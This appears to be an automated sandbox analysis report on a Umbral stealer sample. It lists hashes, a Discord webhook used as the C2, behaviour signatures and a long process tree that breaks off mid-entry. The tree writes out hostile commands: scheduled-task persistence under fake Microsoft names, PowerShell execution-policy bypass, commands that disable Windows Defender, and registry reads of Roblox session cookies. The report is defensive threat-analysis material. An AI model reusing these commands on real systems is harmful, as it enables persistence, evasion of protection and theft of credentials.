Analysis

  • max time kernel
    644s
  • max time network
    646s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-05-2024 12:34

Errors

Reason
Machine shutdown

General

  • Target

    Client1.exe

  • Size

    747KB

  • MD5

    c8d8bf0cef0eb986664a7653b30062b6

  • SHA1

    da1957c3bcd76a71d8182fd42a677e5aeaf76cde

  • SHA256

    e3b98f944dd0cf41f0955cbc2b8858d249a39f69568ea82286d14e20d8e9c910

  • SHA512

    34278aee895a03cd76b56278c5b362aa013d83f8be355fd5fdac442e19eaf5a60477f317cdeac157ba69785661866ff41d6051c1cb40ecb473c2814c5d0c672a

  • SSDEEP

    12288:+cWW/gSKBvPVle8c6bn3VG0jMRxPjT90n/4mhBE:+CNEVXePjT90ww

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1243097311723393148/0kJSMmx_-19_4524KFq8Hz7UKUelS_Uh7rQ6mExsss1TqjKf8JjJJVNCnPnFTM52o-iH

Signatures

  • Detect Umbral payload 2 IoCs
  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Disables cmd.exe use via registry modification 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Modifies AppInit DLL entries 2 TTPs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry class 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client1.exe
    "C:\Users\Admin\AppData\Local\Temp\Client1.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Disables cmd.exe use via registry modification
    • Checks computer location settings
    • Adds Run key to start application
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1324
    • C:\Windows\SYSTEM32\CMD.exe
      "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "LastActivityView" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3176
      • C:\Windows\system32\schtasks.exe
        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "LastActivityView" /tr "C:\Users\Admin\Documents\Microsoft Project.exe"
        3⤵
          PID:5000
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3144
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
          3⤵
          • Creates scheduled task(s)
          PID:4816
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive Update" /tr "C:\Users\Public\Documents\Sage CRM.exe" /RL HIGHEST & exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4872
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive Update" /tr "C:\Users\Public\Documents\Sage CRM.exe" /RL HIGHEST
          3⤵
          • Creates scheduled task(s)
          PID:3112
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3080
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
          3⤵
          • Creates scheduled task(s)
          PID:4924
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3464
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
          3⤵
            PID:4252
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4532
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
            3⤵
            • Creates scheduled task(s)
            PID:2056
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1004
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
            3⤵
            • Creates scheduled task(s)
            PID:4408
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4816
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
            3⤵
              PID:3836
          • C:\Windows\SYSTEM32\CMD.exe
            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3380
            • C:\Windows\system32\schtasks.exe
              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
              3⤵
              • Creates scheduled task(s)
              PID:3948
          • C:\Windows\SYSTEM32\CMD.exe
            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
            2⤵
              PID:4892
              • C:\Windows\system32\schtasks.exe
                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                3⤵
                  PID:1416
              • C:\Windows\SYSTEM32\CMD.exe
                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1360
                • C:\Windows\system32\schtasks.exe
                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                  3⤵
                    PID:4832
                • C:\Windows\SYSTEM32\CMD.exe
                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2392
                  • C:\Windows\system32\schtasks.exe
                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                    3⤵
                    • Creates scheduled task(s)
                    PID:3700
                • C:\Windows\SYSTEM32\CMD.exe
                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2884
                  • C:\Windows\system32\schtasks.exe
                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                    3⤵
                      PID:4708
                  • C:\Windows\SYSTEM32\CMD.exe
                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1896
                    • C:\Windows\system32\schtasks.exe
                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                      3⤵
                        PID:2216
                    • C:\Windows\SYSTEM32\CMD.exe
                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4648
                      • C:\Windows\system32\schtasks.exe
                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                        3⤵
                        • Creates scheduled task(s)
                        PID:4924
                    • C:\Windows\SYSTEM32\CMD.exe
                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4384
                      • C:\Windows\system32\schtasks.exe
                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                        3⤵
                        • Creates scheduled task(s)
                        PID:4304
                    • C:\Windows\SYSTEM32\CMD.exe
                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                      2⤵
                        PID:4548
                        • C:\Windows\system32\schtasks.exe
                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                          3⤵
                            PID:1356
                        • C:\Windows\SYSTEM32\CMD.exe
                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                          2⤵
                            PID:3612
                            • C:\Windows\system32\schtasks.exe
                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                              3⤵
                              • Creates scheduled task(s)
                              PID:3040
                          • C:\Windows\SYSTEM32\CMD.exe
                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                            2⤵
                              PID:2264
                              • C:\Windows\system32\schtasks.exe
                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                3⤵
                                  PID:2572
                              • C:\Windows\SYSTEM32\CMD.exe
                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                2⤵
                                  PID:3144
                                  • C:\Windows\system32\schtasks.exe
                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                    3⤵
                                      PID:4816
                                  • C:\Windows\SYSTEM32\CMD.exe
                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                    2⤵
                                      PID:5072
                                      • C:\Windows\system32\schtasks.exe
                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                        3⤵
                                        • Creates scheduled task(s)
                                        PID:3960
                                    • C:\Windows\SYSTEM32\CMD.exe
                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                      2⤵
                                        PID:628
                                        • C:\Windows\system32\schtasks.exe
                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                          3⤵
                                            PID:3080
                                        • C:\Windows\SYSTEM32\CMD.exe
                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                          2⤵
                                            PID:1684
                                            • C:\Windows\system32\schtasks.exe
                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                              3⤵
                                              • Creates scheduled task(s)
                                              PID:816
                                          • C:\Windows\SYSTEM32\CMD.exe
                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                            2⤵
                                              PID:4896
                                              • C:\Windows\system32\schtasks.exe
                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                3⤵
                                                  PID:5008
                                              • C:\Windows\SYSTEM32\CMD.exe
                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                2⤵
                                                  PID:2476
                                                  • C:\Windows\system32\schtasks.exe
                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                    3⤵
                                                    • Creates scheduled task(s)
                                                    PID:212
                                                • C:\Windows\SYSTEM32\CMD.exe
                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                  2⤵
                                                    PID:2388
                                                    • C:\Windows\system32\schtasks.exe
                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                      3⤵
                                                      • Creates scheduled task(s)
                                                      PID:3844
                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                    2⤵
                                                      PID:3788
                                                      • C:\Windows\system32\schtasks.exe
                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                        3⤵
                                                          PID:1532
                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                        2⤵
                                                          PID:1544
                                                          • C:\Windows\system32\schtasks.exe
                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                            3⤵
                                                              PID:780
                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                            2⤵
                                                              PID:5072
                                                              • C:\Windows\system32\schtasks.exe
                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                3⤵
                                                                  PID:704
                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                2⤵
                                                                  PID:1416
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                    3⤵
                                                                      PID:2080
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\br3bbgzw.z3f.exe"' & exit
                                                                    2⤵
                                                                      PID:3040
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\br3bbgzw.z3f.exe"'
                                                                        3⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Loads dropped DLL
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2664
                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\br3bbgzw.z3f.exe
                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\br3bbgzw.z3f.exe"
                                                                          4⤵
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
                                                                          • Modifies registry class
                                                                          PID:3452
                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\play.vbs"
                                                                            5⤵
                                                                            • Enumerates connected drives
                                                                            • Modifies registry class
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:624
                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                      2⤵
                                                                        PID:4344
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                          3⤵
                                                                            PID:8
                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                          2⤵
                                                                            PID:3176
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                              3⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:2796
                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                            2⤵
                                                                              PID:1044
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                3⤵
                                                                                  PID:2140
                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                2⤵
                                                                                  PID:1112
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:2580
                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                  2⤵
                                                                                    PID:1980
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                      3⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:3700
                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                    2⤵
                                                                                      PID:4944
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                        3⤵
                                                                                          PID:1316
                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                        2⤵
                                                                                          PID:3112
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:1528
                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                          2⤵
                                                                                            PID:3176
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                              3⤵
                                                                                                PID:3268
                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                              2⤵
                                                                                                PID:2728
                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                  3⤵
                                                                                                    PID:2636
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe"' & exit
                                                                                                  2⤵
                                                                                                    PID:2264
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe"'
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Loads dropped DLL
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:3944
                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe"
                                                                                                        4⤵
                                                                                                        • Drops file in Drivers directory
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3464
                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                          "wmic.exe" csproduct get uuid
                                                                                                          5⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4584
                                                                                                        • C:\Windows\SYSTEM32\attrib.exe
                                                                                                          "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe"
                                                                                                          5⤵
                                                                                                          • Views/modifies file attributes
                                                                                                          PID:740
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\cusvtnlp.1l2.exe'
                                                                                                          5⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2816
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                          5⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3160
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                          5⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4972
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                          5⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2748
                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                          "wmic.exe" os get Caption
                                                                                                          5⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:8
                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                          "wmic.exe" computersystem get totalphysicalmemory
                                                                                                          5⤵
                                                                                                          • Loads dropped DLL
                                                                                                          PID:3900
                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                          "wmic.exe" csproduct get uuid
                                                                                                          5⤵
                                                                                                            PID:2980
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
